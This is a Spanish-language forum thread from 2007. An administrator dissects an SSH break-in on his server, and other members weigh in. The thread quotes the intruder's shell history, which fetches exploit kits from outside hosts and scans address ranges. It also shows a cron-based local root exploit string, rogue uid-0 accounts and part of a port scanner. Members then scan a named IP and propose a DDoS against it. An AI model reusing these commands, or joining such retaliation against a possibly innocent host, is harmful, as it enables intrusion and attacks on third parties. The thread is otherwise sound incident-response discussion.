Este Cracker mal nacido (no se burlen, que les puede tocar peor, oajala q no asi que PILAS) DEBEN LEERLO

Imagen de BitFrost

Forums: 

Por un error, y por hacer caso de poner la clave admin:admin, tengo a este famoso metido en un servidor, y adiven que es lo que hace:

Al pricipio examinando el correo y el Logwath encuentro que usuario admin ha ingresado correctamente mediante SSH, por lo cual inmediatamente cambio esa @##~|~||€~# clave

Segundo reviso lo que este hdp hace en bash_history, si alguien tiene tiempo y puede averiguar para que sirven los archivos que este hdp utiliza me ayudarian bastante a resolver el problema en el que estoy, miren esto

w
passwd
id
uname -a
wget http://powercomm.iquebec.com/xpls
tar -zxvf xpls
rm -rf xpls
cd nixexp
ls
./jt
cd ..
rm -rf nixexp
ls
ls -al
rm -rf .bash_history
cat /proc/cpuinfo
wget http://oitech69.iquebec.com/oissh.tar
tar -xvf oissh.tar
rm -rf oissh.tar
ls
cd ssh
ls
rm -rf vuln.txt
ls
chmod +x *
ls
./scan 168.10;./scan 216.63;./scan 211.0;./scan 200.237;./scan 200.61;./scan 190.11;./scan 190.12;./scan 190.13;./scan 190.14;./scan 190.15;./scan 193.194;./scan 207.61;./scan 60.56;./scan 64.12;./scan 60.255;./scan 210.177
ls
w

y ahora en ese servidor no tengo internet, pero si coneccion ssh y tengo miles de mails que me dicen

Message 2060:
From root@servidor.XXXXX.com Thu Jun 21 10:44:01 2007
Date: Thu, 21 Jun 2007 10:44:01 -0500
From: root@servidor.XXXX.com (Cron Daemon)
To: root@servidor.XXXXX.com
Subject: Cron chown root:root /home/admin/nixexp/jt && chmod 4755 /home/admin/nixexp/jt && rm -rf /etc/cron.d/core && kill -USR1 7090
X-Cron-Env:
X-Cron-Env:
X-Cron-Env:
X-Cron-Env:
X-Cron-Env:

chown: cannot access `/home/admin/nixexp/jt': No such file or directory

QUE HDP desocupadito

Y por cierto creo estas cuentas

Imagen de BitFrost

brainscan:x:0:780::/home/brainscan:/bin/bash
punkyboy:x:0:781::/home/punkyboy:/bin/bash

"Education is what remains after one has forgotten everything he learned in school." - Albert Einstein
[img]http://counter.li.org/cgi-bin/certificate.cgi/345468[/img]
[img]http://www.geocities.com/andres_genovez/mail.png[/img]

"Education is what remains after one has forgotten everything he learned in school." - Albert Einstein
[img]http://counter.li.org/cgi-bin/certificate.cgi/345468[/img]

Este cracker si que ha tenido tiempo

Imagen de BitFrost

Luego instalo un programa para buscar mas vulnerabilidades

/*
** pscan.c - Originally by Volatile
** modified by riksta, lizard
**
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define MAX_SOCKETS 800
#define TIMEOUT 3

#define S_NONE 0
#define S_CONNECTING 1

struct conn_t {
int s;
char status;
time_t a;
struct sockaddr_in addr;
};
struct conn_t connlist[MAX_SOCKETS]

"Education is what remains after one has forgotten everything he learned in school." - Albert Einstein
[img]http://counter.li.org/cgi-bin/certificate.cgi/345468[/img]
[img]http://www.geocities.com/andres_genovez/mail.png[/img]

"Education is what remains after one has forgotten everything he learned in school." - Albert Einstein
[img]http://counter.li.org/cgi-bin/certificate.cgi/345468[/img]

Vamos con el analisis Forensico

Imagen de BitFrost

Me encuentro enfermo, con una faringoamigdalitis, pero eso no me impide que mis facultades actuen contra este individuo y sus pendejadas

Me bajo chkrootkit de la pagina oficial

Como la coneccion del proveedor tiene problemas, (se cayo el dns por alguna razon, ojala no haya sido poruqe este servidor comprometido lo rebento }:) ) me bajo en un servidor alterno al cual tengo acceso total al servidor comprometido.

solamente hago un wget y http://ip-del-servidor/chkrootkit.tar.gz

descomprimo tar -xvzf chkrootkit.tar.gz

ingreso al directorio y doy un make all

Investigando este incidente, miro que dentro del directorio /etc/cron.d hay un archivo bien pendejo llamado core.7091, remuevo este archivo porque me esta haciendo crecer la pasciencia y ademas me esta mandando mails de que Cron no pudo hacer no se que pendejada ya van como 2050 mails de los mismos

le mando a este archivaldo al /home/admin

y luego de que ya compile todo trato de indagar que diablos es ese archivo binario core.7091

realizo

#./strings-static /home/admin/core.7091

y miren esto

---------output------------

basura

basura
y mas basura

hey algo interesante

[+] getting root shell
/bin/sh
[-] execle
prctl() suidsafe exploit
(C) Julien TINNES
/proc/self/exe
[-] readlink
This is not fatal, rewrite the exploit
[-] signal
[+] Installed signal handler
/etc/cron.d
[-] chdir
[-] prtctl
Is you kernel version >= 2.6.13 ?
[+] We are suidsafe dumpable!
/etc/cron.d/core
[-] cronstring is too small
[+] Malicious string forged
[-] fork
[+] Segfaulting child
[-] kill
[+] Waiting for exploit to succeed (~%ld seconds)
[-] It looks like the exploit failed
$\d7
060C
zC@`8@
:PCD
"C4@
P8p;
:;Zjz@D@
T#/etc/cron.d/core suid_dumpable exploit
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
#%s* * * * *root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d
/home/admin/nixexp/jt
#/etc/cron.d/core suid_dumpable exploit
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
## * * * * * root chown root:root /home/admin/nixexp/jt && chmod 4755 /home/admin/nixexp/jt && rm -rf /etc/cron.d/core && kill -USR1 7090

y miren esto

SSH_CONNECTION=::ffff:24.122.144.125 48640

-------output-------------

24.122.144.125!!!!!!! POR FAVOR REBIENTENLO

If the Author of this cracking session is reading this, take note, we Ecuadorians aren´t noobs, very few people that think they are administrators can make a mes like that to put the same user and password equal, Thank you very much for your f***ing time to exploit my server, it makes me happy, guess why??? because I NOW LEARNED a LOT of a LAMMER, that F***ING server is going to be complete formated, and don´t be supprissed if some one of my coleages kick your damn a55

Thank you

"Education is what remains after one has forgotten everything he learned in school." - Albert Einstein
[img]http://counter.li.org/cgi-bin/certificate.cgi/345468[/img]
[img]http://www.geocities.com/andres_genovez/mail.png[/img]

"Education is what remains after one has forgotten everything he learned in school." - Albert Einstein
[img]http://counter.li.org/cgi-bin/certificate.cgi/345468[/img]

Podemos hacer un DDOS??

Imagen de Monkito

xfis digan que si... yo pongo 512Kbps..

por lo pronto tengo estoo:


IP address: 24.122.144.125
Reverse DNS: 144-125.dr.cgocable.ca.
Reverse DNS authenticity: [Verified]
ASN: 11290
ASN Name: RAPIDUS
IP range connectivity: 4
Registrar (per ASN): ARIN
Country (per IP registrar): CA [Canada]
Country Currency: CAD [Canada Dollars]
Country IP Range: 24.122.0.0 to 24.122.255.255
Country fraud profile: Normal
City (per outside source): Montreal, Quebec
Country (per outside source): CA [Canada]
Private (internal) IP? No
IP address registrar: whois.arin.net
Known Proxy? No

Cogito Ergo Sum

------------
counter.li.org

Cogito Ergo Sum

Ta algo raro

Imagen de Monkito

No llego por medio de traceroute


17 Pos-channel1.mcore4.MTT-Montreal.teleglobe.net (216.6.81.18) 154.692 ms 155.067 ms 155.478 ms
18 if-3-0.mcore3.MTT-Montreal.teleglobe.net (216.6.114.1) 155.477 ms 155.471 ms *
19 ix-0-1.mcore3.MTT-Montreal.teleglobe.net (216.6.114.22) 156.081 ms 156.441 ms 156.434 ms
20 * * *
21 * * *
22 * * *
23 * * *
24 * * *
25 * * *
26 * * *
27 * * *
28 * * *
29 * * *
30 * * *

Por otro lado miren:


Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2007-06-21 12:55 ECT
DNS resolution of 1 IPs took 5.53s.
Initiating SYN Stealth Scan against 144-125.dr.cgocable.ca (24.122.144.125) [1680 ports] at 12:56
Discovered open port 80/tcp on 24.122.144.125
The SYN Stealth Scan took 21.94s to scan 1680 total ports.
Host 144-125.dr.cgocable.ca (24.122.144.125) appears to be up ... good.
Interesting ports on 144-125.dr.cgocable.ca (24.122.144.125):
Not shown: 1679 filtered ports
PORT STATE SERVICE
80/tcp open http

Nmap finished: 1 IP address (1 host up) scanned in 27.783 seconds
Raw packets sent: 3365 (148.040KB) | Rcvd: 17 (928B)


La deteción de sistema operativo nos da esto:

Interesting ports on 144-125.dr.cgocable.ca (24.122.144.125):
Not shown: 1679 filtered ports
PORT STATE SERVICE
80/tcp open http
Device type: broadband router|general purpose
Running: Level One embedded, Linux 2.6.X
OS details: LevelOne WBR-3403TX Wireless Broadband router, Linux 2.6.5 - 2.6.11
Uptime 16.195 days (since Tue Jun 5 08:18:11 2007)

Parece que quien te atacó no tiene una ip pública sino que sale por medio de ese router...

Cogito Ergo Sum

------------
counter.li.org

Cogito Ergo Sum

Si, a mi con el jwhois me da

Imagen de The One

Si, a mi con el jwhois me da esto:


COGECO Cable Canada Inc. RAPIDUS-02 (NET-24-122-0-0-1)
24.122.0.0 - 24.122.255.255
COGECO Cable Canada Inc. COQB-RI02 (NET-24-122-128-0-1)
24.122.128.0 - 24.122.175.255

y para ver en que país esta esta dirección ya que es un router podemos ver el mapa en ip2location y al parecer esta en CANADA-Montreal-Quebec y el ISP de este tipo es COGECO CABLE CANADA INC, el dominio es cgocable.net

No creo que sea lo mejor

Imagen de acl

A mi me parece que quien se metio no es humano, y la maquina de donde salio toda esa ñoña, pertenece a alguna pobre abuelita, y es parte de algun botnet o que se yo... Las claves estan en un archivo de texto en el tar que se metio en tu maquina y ahi estan bastantes.

No me parece que se les deba pagar con la misma moneda, sobre todo porque no va a ser a los autores del crimen a quienes vamos a llegar. Todo parece indicar que esta cosa que se te metio tambien busca otros focos de infeccion luego de infectarte.

Lo mejor es actualizar tus kernels menores a 2.6.17 y cuidar las cuentas. Tambien recomendaria pasar el disco por un borrador de cintas y empezar de nuevo. Tambien te recomiendo usar tripwire para monitorear cambios no deseados.

No creo que sea de una Abuelita esa maquina

Imagen de BitFrost

Aunque la abuelita presuntusoamente podria ser una cracker, se nota que es humano quien se metio, porque en esta parte lo delatan

rm -rf .bash_history

el muy sabiote borra el .bash_history pero no se da cuenta, que todo se queda en el buffer del history y este se graba luego de que se hace un logout que pendejo

para ello hubiera utilizado un history -c antes de salirse del sistema, pero obiamente es un Lammer tonces e ahi porque tanta sed de justicia

"Education is what remains after one has forgotten everything he learned in school." - Albert Einstein
[img]http://counter.li.org/cgi-bin/certificate.cgi/345468[/img]
[img]http://www.geocities.com/andres_genovez/mail.png[/img]

"Education is what remains after one has forgotten everything he learned in school." - Albert Einstein
[img]http://counter.li.org/cgi-bin/certificate.cgi/345468[/img]

Palichis puedes postear los exploits ??

Imagen de BitFrost

La "abuelita" o "abuelito" usaron los siguientes exploits postealos para analizarlos

wget http://powercomm.iquebec.com/xpls
wget http://oitech69.iquebec.com/oissh.tar

Gracias por la ayuda amigos, no busco venganza, solo quiero saber como diablos hizo lo que hizo, aparte de meterse como admin

"Education is what remains after one has forgotten everything he learned in school." - Albert Einstein
[img]http://counter.li.org/cgi-bin/certificate.cgi/345468[/img]
[img]http://www.geocities.com/andres_genovez/mail.png[/img]

"Education is what remains after one has forgotten everything he learned in school." - Albert Einstein
[img]http://counter.li.org/cgi-bin/certificate.cgi/345468[/img]

La cuestion también seria

Imagen de The One

La cuestion también seria darle una lección para que asi aprenda, esto pudo haber pasado a cualquiera de nosotros y nadie esta salvo que en algún momento bien por descuido o por mala suerte le pase lo mismo que a BitFrost.

Páginas